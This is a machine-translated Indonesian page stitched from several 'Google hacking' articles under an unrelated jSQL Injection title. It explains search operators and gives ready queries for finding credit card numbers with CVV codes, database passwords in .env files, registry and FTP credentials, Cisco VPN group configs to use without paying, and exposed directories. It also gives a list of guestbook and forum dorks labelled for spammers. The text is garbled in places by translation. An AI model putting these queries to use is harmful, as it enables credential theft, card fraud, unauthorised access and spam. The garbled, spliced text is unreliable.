Petunjuk penggunaan jSQL Injection, alat multifungsi untuk menemukan dan mengeksploitasi injeksi SQL di Kali Linux. Menggunakan Fitur Google yang Sedikit Dikenal untuk Menemukan Penggunaan Tersembunyi Google sebagai Pemindai CGI

Menerima data pribadi tidak selalu berarti peretasan - terkadang dipublikasikan di akses publik. Pengetahuan pengaturan Google dan sedikit kecerdikan akan memungkinkan Anda menemukan banyak hal menarik - mulai dari nomor kartu kredit hingga dokumen FBI.

PERINGATAN

Semua informasi disediakan untuk tujuan informasional saja. Baik editor maupun penulis tidak bertanggung jawab atas kemungkinan kerugian yang disebabkan oleh materi artikel ini.

Semuanya terhubung ke Internet saat ini, tidak terlalu peduli dengan pembatasan akses. Oleh karena itu, banyak data pribadi yang menjadi mangsa mesin pencari. Robot laba-laba tidak lagi terbatas pada halaman web, tetapi mengindeks semua konten yang tersedia di Web dan terus menambahkan informasi rahasia ke database mereka. Mempelajari rahasia ini mudah - Anda hanya perlu tahu cara menanyakannya.

Mencari file

Di tangan yang ahli, Google akan dengan cepat menemukan segala sesuatu yang buruk di Web, seperti informasi pribadi dan file untuk penggunaan resmi. Mereka sering disembunyikan seperti kunci di bawah permadani: tidak ada batasan akses nyata, datanya hanya terletak di bagian belakang situs, di mana tautan tidak mengarah. Antarmuka web standar Google hanya menyediakan pengaturan dasar pencarian lanjutan, tetapi bahkan itu sudah cukup.

Ada dua operator yang dapat Anda gunakan untuk membatasi pencarian Google ke file jenis tertentu: filetype dan ext . Yang pertama mengatur format yang ditentukan mesin pencari oleh header file, yang kedua - ekstensi file, terlepas dari konten internalnya. Saat mencari dalam kedua kasus, Anda hanya perlu menentukan ekstensi. Awalnya, operator ext nyaman digunakan jika tidak ada fitur format khusus untuk file tersebut (misalnya, untuk mencari file konfigurasi ini dan cfg, yang dapat berisi apa saja). Sekarang algoritma Google berubah, dan tidak ada perbedaan yang terlihat antara operator - hasilnya sama dalam banyak kasus.


Memfilter keluaran

Secara default, Google mencari kata-kata dan secara umum untuk setiap karakter yang dimasukkan di semua file pada halaman yang diindeks. Anda dapat membatasi ruang lingkup pencarian berdasarkan domain tingkat atas, situs tertentu, atau lokasi urutan yang diinginkan dalam file itu sendiri. Untuk dua opsi pertama, pernyataan situs digunakan, diikuti dengan nama domain atau situs yang dipilih. Dalam kasus ketiga, seluruh rangkaian operator memungkinkan Anda mencari informasi di bidang layanan dan metadata. Misalnya, allinurl akan menemukan yang ditentukan di badan tautan itu sendiri, allinanchor - di teks yang disediakan dengan tag , allintitle - di header halaman, allintext - di badan halaman.

Untuk setiap operator ada versi yang lebih ringan dengan nama yang lebih pendek (tanpa awalan semua). Perbedaannya adalah allinurl akan menemukan tautan dengan semua kata, sedangkan inurl hanya akan menemukan tautan dengan yang pertama. Kata kedua dan selanjutnya dari kueri dapat muncul di mana saja di halaman web. Operator inurl juga berbeda dari situs lain yang memiliki arti serupa. Yang pertama juga memungkinkan Anda menemukan urutan karakter apa pun dalam tautan ke dokumen yang diinginkan (misalnya, /cgi-bin/), yang banyak digunakan untuk menemukan komponen dengan kerentanan yang diketahui.

Mari kita coba dalam praktek. Kami mengambil filter allintext dan membuat kueri mengembalikan daftar nomor kartu kredit dan kode verifikasi, yang akan kedaluwarsa hanya setelah dua tahun (atau ketika pemiliknya bosan memberi makan semua orang berturut-turut).

Allintext: tanggal kedaluwarsa nomor kartu /2017 cvv

Ketika Anda membaca di berita bahwa seorang peretas muda "meretas ke dalam server" Pentagon atau NASA, mencuri informasi rahasia, maka dalam banyak kasus justru teknik dasar menggunakan Google ini. Misalkan kita tertarik dengan daftar karyawan NASA dan detail kontak mereka. Tentunya daftar seperti itu dalam bentuk elektronik. Demi kenyamanan atau karena kekhilafan, bisa juga terletak pada website organisasi itu sendiri. Adalah logis bahwa dalam hal ini tidak akan ada referensi untuk itu, karena dimaksudkan untuk penggunaan internal. Kata-kata apa yang bisa ada dalam file seperti itu? Setidaknya - bidang "alamat". Sangat mudah untuk menguji semua asumsi ini.


inurl:nasa.gov tipe file:xlsx "alamat"


Kami menggunakan birokrasi

Temuan semacam itu adalah hal yang menyenangkan. Tangkapan yang benar-benar solid berasal dari pengetahuan yang lebih mendetail tentang Operator Webmaster Google, Web itu sendiri, dan struktur dari apa yang Anda cari. Mengetahui detailnya, Anda dapat dengan mudah memfilter keluaran dan menyempurnakan properti file yang Anda butuhkan untuk mendapatkan data yang sangat berharga dari yang lainnya. Lucu sekali birokrasi datang untuk menyelamatkan di sini. Ini menghasilkan formulasi khas yang memudahkan pencarian informasi rahasia yang secara tidak sengaja bocor ke Web.

Misalnya, stempel pernyataan Distribusi, yang wajib ada di kantor Departemen Pertahanan AS, berarti pembatasan standar pada distribusi dokumen. Huruf A menandai rilis publik di mana tidak ada rahasia; B - ditujukan hanya untuk penggunaan internal, C - sangat rahasia, dan seterusnya hingga F. Secara terpisah, ada huruf X, yang menandai informasi yang sangat berharga yang merupakan rahasia negara tingkat tertinggi. Biarlah mereka yang seharusnya bertugas mencari dokumen semacam itu, dan kami akan membatasi diri pada file dengan huruf C. Menurut DoDI 5230.24, penandaan tersebut diberikan pada dokumen yang berisi deskripsi teknologi kritis yang berada di bawah kendali ekspor. Anda dapat menemukan informasi yang dijaga dengan hati-hati di situs di domain tingkat atas .mil yang dialokasikan untuk Angkatan Darat AS.

"PERNYATAAN DISTRIBUSI C" inurl:navy.mil

Sangat nyaman bahwa hanya situs dari Departemen Pertahanan AS dan organisasi kontraknya yang dikumpulkan dalam domain .mil. Hasil pencarian terbatas domain sangat bersih, dan judulnya berbicara sendiri. Praktis tidak ada gunanya mencari rahasia Rusia dengan cara ini: kekacauan menguasai domain .ru dan .rf, dan nama banyak sistem senjata terdengar seperti botani (PP "Kiparis", senjata self-propelled "Acacia") atau bahkan luar biasa (TOS "Pinocchio").


Dengan hati-hati memeriksa dokumen apa pun dari situs di domain .mil, Anda dapat melihat penanda lain untuk mempersempit pencarian Anda. Misalnya, referensi pembatasan ekspor "Sec 2751", yang juga nyaman untuk mencari informasi teknis yang menarik. Dari waktu ke waktu, itu dihapus dari situs resmi tempat ia pernah muncul, jadi jika Anda tidak dapat mengikuti tautan menarik di hasil pencarian, gunakan cache Google (operator cache) atau situs Internet Archive.

Kami naik ke awan

Selain dokumen yang tidak diklasifikasikan secara tidak sengaja dari departemen pemerintah, tautan ke file pribadi dari Dropbox dan layanan penyimpanan data lainnya yang membuat tautan "pribadi" ke data yang dipublikasikan secara publik terkadang muncul di cache Google. Lebih buruk lagi dengan layanan alternatif dan buatan sendiri. Misalnya, kueri berikut menemukan data semua klien Verizon yang memasang server FTP dan secara aktif menggunakan router di router mereka.

Allinurl:ftp://verizon.net

Sekarang ada lebih dari empat puluh ribu orang pintar seperti itu, dan pada musim semi 2015 ada lebih banyak lagi. Alih-alih Verizon.net, Anda dapat mengganti nama penyedia terkenal mana pun, dan semakin terkenal, semakin besar tangkapannya. Melalui server FTP bawaan, Anda dapat melihat file di drive eksternal yang terhubung ke router. Biasanya ini adalah NAS untuk pekerjaan jarak jauh, cloud pribadi, atau semacam unduhan file peer-to-peer. Semua konten media tersebut diindeks oleh Google dan mesin pencari lainnya, sehingga Anda dapat mengakses file yang disimpan di drive eksternal melalui tautan langsung.

Mengintip konfigurasi

Sebelum migrasi besar-besaran ke cloud, server FTP sederhana, yang juga tidak memiliki kerentanan, diatur sebagai penyimpanan jarak jauh. Banyak di antaranya masih relevan hingga saat ini. Misalnya, program WS_FTP Professional yang populer menyimpan data konfigurasi, akun pengguna, dan kata sandi di file ws_ftp.ini. Mudah ditemukan dan dibaca karena semua entri disimpan dalam teks biasa dan kata sandi dienkripsi menggunakan algoritma Triple DES setelah kebingungan minimal. Di sebagian besar versi, membuang byte pertama saja sudah cukup.

Mendekripsi kata sandi semacam itu mudah dilakukan dengan menggunakan utilitas WS_FTP Password Decryptor atau layanan web gratis.

Ketika berbicara tentang meretas situs yang sewenang-wenang, biasanya itu berarti mendapatkan kata sandi dari log dan cadangan file konfigurasi aplikasi CMS atau e-niaga. Jika Anda mengetahui struktur tipikalnya, Anda dapat dengan mudah menunjukkannya kata kunci. Baris seperti yang ditemukan di ws_ftp.ini sangat umum. Misalnya, Drupal dan PrestaShop selalu memiliki ID pengguna (UID) dan kata sandi (pwd) yang sesuai, dan semua informasi disimpan dalam file dengan ekstensi .inc. Anda dapat mencari mereka seperti ini:

"pwd=" "UID=" ext:inc

Kami mengungkapkan kata sandi dari DBMS

Dalam file konfigurasi server SQL, nama dan alamat Surel pengguna disimpan dalam teks yang jelas, dan hash MD5 mereka ditulis sebagai pengganti kata sandi. Mendekripsinya, sebenarnya, tidak mungkin, tetapi Anda dapat menemukan kecocokan di antara pasangan kata sandi hash yang diketahui.

Hingga saat ini, ada DBMS yang bahkan tidak menggunakan hashing kata sandi. File konfigurasi salah satunya dapat dilihat dengan mudah di browser.

Intext: tipe file DB_PASSWORD: env

Dengan munculnya server Windows, tempat file konfigurasi sebagian diambil oleh registri. Anda dapat mencari melalui cabangnya dengan cara yang persis sama, menggunakan reg sebagai tipe file. Misalnya, seperti ini:

Jenis file:reg HKEY_CURRENT_USER "Kata Sandi"=

Jangan Lupa Yang Sudah Jelas

Terkadang dimungkinkan untuk mendapatkan informasi rahasia dengan bantuan data yang dibuka dan ditangkap secara tidak sengaja oleh Google. Pilihan yang ideal adalah menemukan daftar kata sandi dalam beberapa format umum. Menyimpan informasi akun di file teks, Dokumen kata atau elektronik Lembar kerja Excel Hanya orang yang putus asa yang bisa, tetapi jumlah mereka selalu cukup.

Jenis file:xls inurl:kata sandi

Di satu sisi, ada banyak cara untuk mencegah kejadian seperti itu. Penting untuk menentukan hak akses yang memadai di htaccess, tambalan CMS, jangan gunakan skrip kiri dan tutup lubang lainnya. Ada juga file dengan daftar pengecualian robots.txt, yang melarang mesin telusur mengindeks file dan direktori yang ditentukan di dalamnya. Di sisi lain, jika struktur robots.txt di beberapa server berbeda dari yang standar, maka segera menjadi jelas apa yang mereka coba sembunyikan di dalamnya.

Daftar direktori dan file di situs mana pun diawali dengan indeks prasasti standar. Karena harus muncul di judul untuk tujuan layanan, masuk akal untuk membatasi pencariannya ke operator intitle. Hal-hal menarik dapat ditemukan di direktori /admin/, /personal/, /etc/ dan bahkan /secret/.

Ikuti pembaruan

Relevansi sangat penting di sini: kerentanan lama ditutup dengan sangat lambat, tetapi Google dan hasil penelusurannya terus berubah. Bahkan ada perbedaan antara filter "detik terakhir" (&tbs=qdr:s di akhir url permintaan) dan filter "waktu nyata" (&tbs=qdr:1).

Rentang waktu tanggal pembaruan terbaru File Google juga ditunjukkan secara implisit. Melalui antarmuka web grafis, Anda dapat memilih salah satu periode umum (jam, hari, minggu, dan seterusnya) atau menetapkan rentang tanggal, tetapi metode ini tidak cocok untuk otomatisasi.

Dari tampilan bilah alamat, orang hanya dapat menebak tentang cara membatasi keluaran hasil menggunakan konstruksi &tbs=qdr:. Huruf y setelahnya menyatakan batas satu tahun (&tbs=qdr:y), m menunjukkan hasil bulan lalu, w untuk minggu ini, d untuk hari terakhir, h untuk jam terakhir, n untuk menit, dan s untuk memberi saya waktu sebentar. Hasil terbaru yang baru saja diketahui Google ditemukan menggunakan filter &tbs=qdr:1.

Jika Anda perlu menulis skrip yang rumit, akan berguna untuk mengetahui bahwa rentang tanggal disetel di Google dalam format Julian melalui operator rentang tanggal. Misalnya, Anda dapat menemukan daftar dokumen PDF dengan kata rahasia yang diunggah antara 1 Januari dan 1 Juli 2015.

Tipe file rahasia: pdf rentang tanggal: 2457024-2457205

Rentang ditentukan dalam format tanggal Julian tanpa desimal. Tidak nyaman menerjemahkannya secara manual dari kalender Gregorian. Lebih mudah menggunakan konverter tanggal.

Menargetkan dan memfilter lagi

Selain menentukan operator tambahan dalam kueri penelusuran, mereka dapat dikirim langsung di badan tautan. Misalnya, sifat filetype:pdf sesuai dengan konstruksi as_filetype=pdf. Dengan demikian, akan lebih mudah untuk mengatur klarifikasi apa pun. Katakanlah keluaran hasil hanya dari Republik Honduras ditetapkan dengan menambahkan konstruksi cr=countryHN ke URL pencarian, tetapi hanya dari kota Bobruisk - gcs=Bobruisk . Lihat bagian pengembang untuk daftar lengkap .

Alat otomatisasi Google dirancang untuk membuat hidup lebih mudah, tetapi sering kali menambah kerumitan. Misalnya, kota pengguna ditentukan oleh IP pengguna melalui WHOIS. Berdasarkan informasi ini, Google tidak hanya menyeimbangkan beban antar server, tetapi juga mengubah hasil pencarian. Bergantung pada wilayahnya, untuk kueri yang sama, hasil yang berbeda akan sampai ke halaman pertama, dan beberapa di antaranya mungkin benar-benar tersembunyi. Merasa seperti kosmopolitan dan mencari informasi dari negara mana pun akan membantu kode dua hurufnya setelah arahan gl=country . Misalnya kode untuk Belanda adalah NL, sedangkan Vatikan dan Korea Utara tidak memiliki kode sendiri di Google.

Seringkali hasil pencarian dikotori bahkan setelah menggunakan beberapa filter lanjutan. Dalam hal ini, mudah untuk menyempurnakan kueri dengan menambahkan beberapa kata pengecualian ke dalamnya (masing-masing didahului dengan tanda minus). Misalnya, perbankan, nama, dan tutorial sering digunakan dengan kata Pribadi. Oleh karena itu, hasil pencarian yang lebih bersih tidak akan menampilkan contoh kueri buku teks, tetapi yang disempurnakan:

Intitle:"Index of /Personal/" -names -tutorial -banking

Contoh Terakhir

Peretas yang canggih dibedakan oleh fakta bahwa dia menyediakan sendiri semua yang dia butuhkan. Misalnya, VPN adalah hal yang nyaman, tetapi mahal atau sementara dan dengan batasan. Mendaftar untuk diri sendiri saja terlalu mahal. Ada baiknya ada langganan grup, tapi dengan Google Sangat mudah untuk menjadi bagian dari grup. Untuk melakukan ini, temukan saja file konfigurasi Cisco VPN, yang memiliki ekstensi PCF yang agak tidak standar dan jalur yang dapat dikenali: Program Files\Cisco Systems\VPN Client\Profiles . Satu permintaan, dan Anda bergabung, misalnya, staf Universitas Bonn yang ramah.

Jenis file: pcf vpn ATAU Grup

INFO

Google menemukan file konfigurasi dengan kata sandi, tetapi banyak di antaranya dienkripsi atau diganti dengan hash. Jika Anda melihat string dengan panjang tetap, segera cari layanan dekripsi.

Kata sandi disimpan dalam bentuk terenkripsi, tetapi Maurice Massard telah menulis program untuk mendekripsinya dan menyediakannya secara gratis melalui thecampusgeeks.com.

Dengan bantuan Google, ratusan jenis serangan dan uji penetrasi dilakukan. Ada banyak opsi, yang memengaruhi program populer, format basis data utama, banyak kerentanan PHP, cloud, dan sebagainya. Mengetahui dengan tepat apa yang Anda cari membuatnya lebih mudah untuk mendapatkan informasi yang Anda butuhkan (terutama informasi yang tidak ingin Anda publikasikan). Tidak ada Shodan tunggal yang memelihara ide-ide menarik, tetapi basis data apa pun dari sumber daya jaringan yang diindeks!

Cara mencari menggunakan google.com

Semua orang mungkin tahu cara menggunakan mesin pencari seperti Google =) Tapi tidak semua orang tahu itu jika Anda menulis dengan benar permintaan pencarian dengan bantuan desain khusus, Anda dapat mencapai hasil yang Anda cari jauh lebih efisien dan cepat =) Pada artikel ini saya akan mencoba menunjukkan apa dan bagaimana yang perlu Anda lakukan untuk mencari dengan benar

Google mendukung beberapa operator penelusuran lanjutan yang memiliki arti khusus saat menelusuri di google.com. Biasanya, operator ini mengubah pencarian, atau bahkan memberi tahu Google untuk melakukan jenis pencarian yang sama sekali berbeda. Misalnya konstruksinya tautan: adalah operator khusus, dan query tautan: www.google.com tidak akan memberi Anda pencarian normal, tetapi malah akan menemukan semua halaman web yang memiliki tautan ke google.com.
jenis permintaan alternatif

cache: Jika Anda menyertakan kata lain dalam kueri, Google akan menyorot kata-kata yang disertakan tersebut dalam dokumen yang di-cache.
Sebagai contoh, cache: www.situs web akan menampilkan konten yang di-cache dengan kata "web" yang disorot.

tautan: kueri penelusuran di atas akan menampilkan halaman web yang berisi tautan ke kueri yang ditentukan.
Sebagai contoh: link: www.website akan menampilkan semua halaman yang memiliki link ke http://www.site

terkait: Menampilkan halaman web yang "terkait" dengan halaman web yang ditentukan.
Sebagai contoh, terkait: www.google.com akan mencantumkan halaman web yang serupa halaman rumah Google.

informasi: Informasi Permintaan: akan memberikan beberapa informasi yang dimiliki Google tentang halaman web yang diminta.
Sebagai contoh, info: situs web akan menampilkan informasi tentang forum kami =) (Armada - Forum webmaster dewasa).

permintaan informasi lainnya

mendefinisikan: Definisikan: kueri akan memberikan definisi kata yang Anda ketikkan setelah ini, yang dikumpulkan dari berbagai sumber online. Definisi akan untuk seluruh frase yang dimasukkan (yaitu, itu akan mencakup semua kata dalam kueri yang tepat).

saham: Jika Anda memulai kueri dengan saham: Google akan memperlakukan sisa istilah kueri sebagai penanda saham, dan menautkan ke halaman yang menampilkan informasi yang disiapkan untuk karakter tersebut.
Sebagai contoh, saham: intel yahoo akan menampilkan informasi tentang Intel dan Yahoo. (Perhatikan bahwa Anda harus mencetak karakter berita terkini, bukan nama perusahaan)

Minta Pengubah

lokasi: Jika Anda menyertakan situs: dalam kueri Anda, Google akan membatasi hasil ke situs web yang ditemukannya di domain tersebut.
Anda juga dapat mencari zona individual, seperti ru, org, com, dll ( situs: com situs: ru)

semua dalam judul: Jika Anda menjalankan kueri dengan allintitle:, Google akan membatasi hasil dengan semua kata kueri dalam judul.
Sebagai contoh, allintitle: pencarian google akan mengembalikan semua halaman pencarian Google seperti gambar, Blog, dll

judul: Jika Anda menyertakan intitle: dalam kueri Anda, Google akan membatasi hasil pada dokumen yang mengandung kata tersebut dalam judul.
Sebagai contoh, judul: Bisnis

allinurl: Jika Anda menjalankan kueri dengan allinurl: Google akan membatasi hasil dengan semua kata kueri di URL.
Sebagai contoh, allinurl: pencarian google akan mengembalikan dokumen dengan google dan mencari di judul. Selain itu, sebagai opsi, Anda dapat memisahkan kata dengan garis miring (/) lalu kata-kata di kedua sisi garis miring tersebut akan dicari dalam halaman yang sama: Contoh allinurl: foo/bar

inurl: Jika Anda menyertakan inurl: dalam kueri Anda, Google akan membatasi hasilnya pada dokumen yang berisi kata tersebut di URL.
Sebagai contoh, Inurl animasi: situs web

dalam tulisan: hanya mencari di teks halaman untuk kata yang ditentukan, mengabaikan judul dan teks tautan, dan hal-hal lain yang tidak terkait Ada juga turunan dari pengubah ini - semua teks: itu. selanjutnya, semua kata dalam kueri hanya akan dicari dalam teks, yang juga penting, mengabaikan kata yang sering digunakan dalam tautan
Sebagai contoh, inteks: forum

rentang tanggal: pencarian dalam kerangka waktu (rentang tanggal:2452389-2452389), tanggal waktu ditentukan dalam format Julian.

Nah, dan segala macam contoh permintaan yang menarik

Contoh kompilasi kueri untuk Google. Untuk spammer

inurl:control.guest?a=tanda

Situs: books.dreambook.com "URL Beranda" "Tanda tangani" inurl: tanda

Situs: Beranda www.freegb.net

Inurl:sign.asp "Jumlah Karakter"

"Pesan:" inurl:sign.cfm "Pengirim:"

inurl:register.php "Pendaftaran Pengguna" "Situs Web"

Inurl:edu/buku tamu “Masukkan Buku Tamu”

Inurl:posting "Posting Komentar" "URL"

Inurl:/arsip/ "Komentar:" "Ingat info?"

“Skrip dan Buku Tamu Dibuat oleh:” “URL:” “Komentar:”

inurl:?action=tambahkan "phpBook" "URL"

Intitle:"Kirim Cerita Baru"

Majalah

inurl:www.livejournal.com/users/mode=reply

inurl greatestjournal.com/mode=balas

Inurl: fastbb.ru/re.pl?

inurl:fastbb.ru /re.pl? "Buku tamu"

Blog

Inurl:blogger.com/comment.g?”postID”"anonim"

Inurl:typepad.com/ "Posting komentar" "Ingat info pribadi?"

Inurl:greatestjournal.com/community/ "Kirim komentar" "alamat poster anonim"

"Posting komentar" "alamat poster anonim" -

Intitle: "Kirim komentar"

Inurl:pirillo.com "Kirim komentar"

Forum

Inurl:gate.html?”nama=Forum” “mode=balasan”

inurl:”forum/posting.php?mode=balas”

inurl:”mes.php?”

inurl:”anggota.html”

inurl:forum/memberlist.php?”

Meretas dengan Google

Alexander Antipov

Sistem pencarian Google (www.google.com) menyediakan banyak pilihan pencarian. Semua fitur ini adalah alat pencarian yang tak ternilai untuk pengguna Internet pertama kali dan pada saat yang sama merupakan senjata invasi dan kehancuran yang lebih kuat di tangan orang-orang dengan niat jahat, termasuk tidak hanya peretas, tetapi juga penjahat non-komputer dan bahkan teroris.
(9475 penayangan dalam 1 minggu)


Denis Batrankov
denisNOSPAMixi.ru

Perhatian:Artikel ini bukan panduan untuk bertindak. Artikel ini ditulis untuk Anda, administrator server WEB, sehingga Anda akan kehilangan perasaan salah bahwa Anda aman, dan Anda akhirnya akan memahami bahaya dari metode memperoleh informasi ini dan bersiap untuk melindungi situs Anda.

pengantar

Misalnya, saya menemukan 1670 halaman dalam 0,14 detik!

2. Mari masukkan baris lain, misalnya:

inurl:"auth_user_file.txt"

sedikit kurang, tetapi ini sudah cukup untuk mengunduh gratis dan menebak kata sandi (menggunakan John The Ripper yang sama). Di bawah ini saya akan memberikan beberapa contoh lagi.

Jadi, Anda perlu menyadari bahwa mesin pencari Google telah mengunjungi sebagian besar situs Internet dan menyimpan informasi yang terkandung di dalamnya. Informasi yang di-cache ini memungkinkan Anda untuk mendapatkan informasi tentang situs dan konten situs tanpa koneksi langsung ke situs, hanya menggali informasi yang disimpan secara internal oleh Google. Apalagi jika informasi di situs sudah tidak tersedia lagi, maka informasi di cache mungkin masih tersimpan. Yang diperlukan untuk metode ini hanyalah mengetahui beberapa kata kunci Google. Teknik ini disebut Peretasan Google.

Untuk pertama kalinya, informasi tentang Peretasan Google muncul di milis Bugtruck 3 tahun lalu. Pada tahun 2001, topik ini diangkat oleh seorang mahasiswa Perancis. Berikut ini tautan ke surat ini http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html . Ini memberikan contoh pertama dari permintaan tersebut:

1) Indeks /admin
2) Indeks / kata sandi
3) Indeks / surat
4) Indeks / +banques +filetype:xls (untuk perancis...)
5) Indeks / +passwd
6) Indeks dari/password.txt

Topik ini membuat banyak keributan di bagian membaca bahasa Inggris di Internet baru-baru ini: setelah sebuah artikel oleh Johnny Long diterbitkan pada 7 Mei 2004. Untuk studi yang lebih lengkap tentang Peretasan Google, saya menyarankan Anda untuk mengunjungi situs penulis ini http://johnny.ihackstuff.com. Pada artikel ini, saya hanya ingin memberi Anda informasi terbaru.

Siapa yang dapat menggunakannya:
- Wartawan, mata-mata, dan semua orang yang suka mencampuri urusan orang lain dapat menggunakan ini untuk mencari bukti kompromi.
- Peretas mencari target yang cocok untuk peretasan.

Cara kerja Google.

Untuk melanjutkan percakapan, izinkan saya mengingatkan Anda tentang beberapa kata kunci yang digunakan dalam kueri Google.

Cari menggunakan tanda +

Google mengecualikan kata-kata yang tidak penting, menurut pendapatnya, dari pencarian. Misalnya, kata tanya, preposisi, dan artikel di bahasa Inggris: misalnya adalah, dari, di mana. Dalam bahasa Rusia, Google tampaknya menganggap semua kata penting. Jika kata tersebut dikecualikan dari pencarian, maka Google akan menulis tentangnya. Agar Google dapat mulai mencari halaman dengan kata-kata ini, Anda perlu menambahkan tanda + di depannya tanpa spasi sebelum kata tersebut. Sebagai contoh:

ace + dari dasar

Cari berdasarkan tanda -

Jika Google menemukan sejumlah besar halaman dari mana Anda ingin mengecualikan halaman dengan topik tertentu, Anda dapat memaksa Google untuk mencari hanya halaman yang tidak berisi kata-kata tertentu. Untuk melakukan ini, Anda perlu menunjukkan kata-kata ini dengan memberi tanda di depan masing-masing - tanpa spasi sebelum kata tersebut. Sebagai contoh:

memancing - vodka

Cari dengan tanda ~

Anda mungkin ingin mencari tidak hanya kata yang ditentukan, tetapi juga sinonimnya. Untuk melakukan ini, awali kata dengan simbol ~.

Menemukan frasa yang tepat menggunakan tanda kutip ganda

Google mencari di setiap halaman untuk semua kemunculan kata-kata yang Anda tulis dalam string kueri, dan tidak peduli dengan posisi relatif kata-kata tersebut, yang utama adalah semua kata yang ditentukan ada di halaman pada waktu yang sama ( ini adalah tindakan default). Mencari frase yang tepat- harus diapit dengan tanda petik. Sebagai contoh:

"bookend"

Untuk memiliki setidaknya satu kata yang ditentukan, Anda harus menentukan operasi logis secara eksplisit: ATAU. Sebagai contoh:

keamanan buku ATAU perlindungan

Selain itu, Anda dapat menggunakan tanda * di baris pencarian untuk menunjukkan kata dan. untuk mewakili karakter apapun.

Menemukan kata-kata dengan operator tambahan

Ada operator pencarian yang ditentukan dalam string pencarian dalam format:

operator: istilah_penelusuran

Ruang di sebelah usus besar tidak diperlukan. Jika Anda memasukkan spasi setelah titik dua, Anda akan melihat pesan kesalahan, dan sebelum itu, Google akan menggunakannya sebagai string pencarian normal.
Ada grup operator pencarian tambahan: bahasa - tunjukkan dalam bahasa apa Anda ingin melihat hasilnya, tanggal - batasi hasil selama tiga, enam atau 12 bulan terakhir, kejadian - tunjukkan di mana dalam dokumen Anda perlu mencari string: di mana saja, di judul, di URL, domain - cari situs yang ditentukan atau sebaliknya kecualikan dari pencarian, Pencarian aman- memblokir situs yang berisi jenis informasi tertentu dan menghapusnya dari halaman hasil pencarian.
Namun, beberapa operator tidak memerlukan parameter tambahan, misalnya kueri " tembolok: www.google.com" dapat disebut sebagai string pencarian lengkap, dan beberapa kata kunci, sebaliknya, memerlukan kata pencarian, misalnya " situs: bantuan www.google.com". Dalam terang subjek kita, mari kita lihat pernyataan berikut:

Operator

Keterangan

Memerlukan parameter tambahan?

telusuri hanya situs yang ditentukan dalam istilah_penelusuran

cari hanya di dokumen dengan ketik istilah_pencarian

temukan halaman yang berisi search_term dalam judul

temukan halaman yang berisi semua kata istilah_pencarian dalam judul

temukan halaman yang berisi kata search_term di alamatnya

temukan halaman yang berisi semua kata istilah_pencarian di alamatnya

Operator lokasi: membatasi pencarian hanya ke situs yang ditentukan, dan Anda tidak hanya dapat menentukan Nama domain tetapi juga alamat IP. Misalnya, masukkan:

Operator tipe file: membatasi pencarian ke file jenis tertentu. Sebagai contoh:

Pada tanggal artikel ini, Google dapat mencari dalam 13 format file yang berbeda:

  • Format Dokumen Portabel Adobe (pdf)
  • Adobe PostScript (ps)
  • Teratai 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus Word Pro (lwp)
  • MacWrite(mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(dokter)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Tulis (wri)
  • Format Teks Kaya (rtf)
  • Shockwave Flash (swf)
  • Teks (ans, txt)

Operator tautan: menampilkan semua halaman yang mengarah ke halaman yang ditentukan.
Pasti selalu menarik untuk melihat berapa banyak tempat di Internet yang tahu tentang Anda. Kita coba:

Operator cache: menunjukkan versi situs yang di-cache Google seperti yang terlihat saat itu google terbaru mengunjungi halaman ini sekali. Kami mengambil situs yang sering berubah dan melihat:

Operator judul: mencari kata yang ditentukan dalam judul halaman. Operator semua dalam judul: adalah ekstensi - mencari semua beberapa kata tertentu dalam judul halaman. Membandingkan:

intitle: terbang ke mars
intitle:penerbangan intitle:on intitle:mars
allintitle:penerbangan ke mars

Operator inurl: menyebabkan Google menampilkan semua halaman yang berisi string yang ditentukan di URL. allinurl: mencari semua kata dalam URL. Sebagai contoh:

allinurl:acid_stat_alerts.php

Perintah ini sangat berguna bagi mereka yang tidak memiliki SNORT - setidaknya mereka dapat melihat cara kerjanya pada sistem nyata.

Metode Peretasan Google

Jadi, kami menemukan bahwa, dengan menggunakan kombinasi operator dan kata kunci di atas, siapa pun dapat mengumpulkan informasi yang diperlukan dan mencari kerentanan. Teknik ini sering disebut sebagai Google Hacking.

Peta Situs

Anda dapat menggunakan pernyataan site: untuk melihat semua tautan yang ditemukan Google di situs. Biasanya halaman yang dibuat secara dinamis oleh skrip tidak diindeks menggunakan parameter, sehingga beberapa situs menggunakan filter ISAPI sehingga tautan tidak berbentuk /article.asp?num=10&dst=5, tetapi dengan garis miring /artikel/abc/num/10/dst/5. Ini dilakukan untuk memastikan bahwa situs tersebut umumnya diindeks oleh mesin pencari.

Mari mencoba:

situs: www.whitehouse.gov whitehouse

Google berpikir bahwa setiap halaman di situs mengandung kata whitehouse. Inilah yang kami gunakan untuk mendapatkan semua halaman.
Ada juga versi yang disederhanakan:

situs: whitehouse.gov

Dan bagian terbaiknya adalah rekan-rekan dari whitehouse.gov bahkan tidak tahu bahwa kami melihat struktur situs mereka dan bahkan melihat halaman cache yang diunduh Google untuk dirinya sendiri. Ini dapat digunakan untuk mempelajari struktur situs dan melihat konten tanpa diketahui untuk saat ini.

Daftar file dalam direktori

Server WEB dapat menampilkan daftar direktori server, bukan yang biasa halaman HTML. Ini biasanya dilakukan agar pengguna memilih dan mengunduh file tertentu. Namun, dalam banyak kasus, administrator tidak memiliki niat untuk menampilkan isi direktori. Ini terjadi karena konfigurasi server yang salah atau kurangnya halaman rumah di direktori. Akibatnya, peretas memiliki kesempatan untuk menemukan sesuatu yang menarik di direktori dan menggunakannya untuk tujuannya sendiri. Untuk menemukan semua halaman seperti itu, cukup diperhatikan bahwa semuanya mengandung kata-kata: indeks dalam judulnya. Tetapi karena indeks kata tidak hanya berisi halaman seperti itu, kami perlu mempersempit kueri dan memperhitungkan kata kunci pada halaman itu sendiri, jadi kueri seperti:

intitle:index.dari direktori induk
intitle:index.dari ukuran nama

Karena sebagian besar daftar direktori disengaja, Anda mungkin kesulitan menemukan daftar yang salah tempat untuk pertama kalinya. Tapi setidaknya Anda akan dapat menggunakan daftar untuk menentukan versi server WEB, seperti yang dijelaskan di bawah ini.

Mendapatkan versi server WEB.

Mengetahui versi server WEB selalu membantu sebelum memulai serangan peretas. Sekali lagi terima kasih kepada Google dimungkinkan untuk mendapatkan informasi ini tanpa terhubung ke server. Jika Anda melihat dengan cermat daftar direktori, Anda dapat melihat bahwa nama server WEB dan versinya ditampilkan di sana.

Apache1.3.29 - ProXad Server di trf296.free.fr Port 80

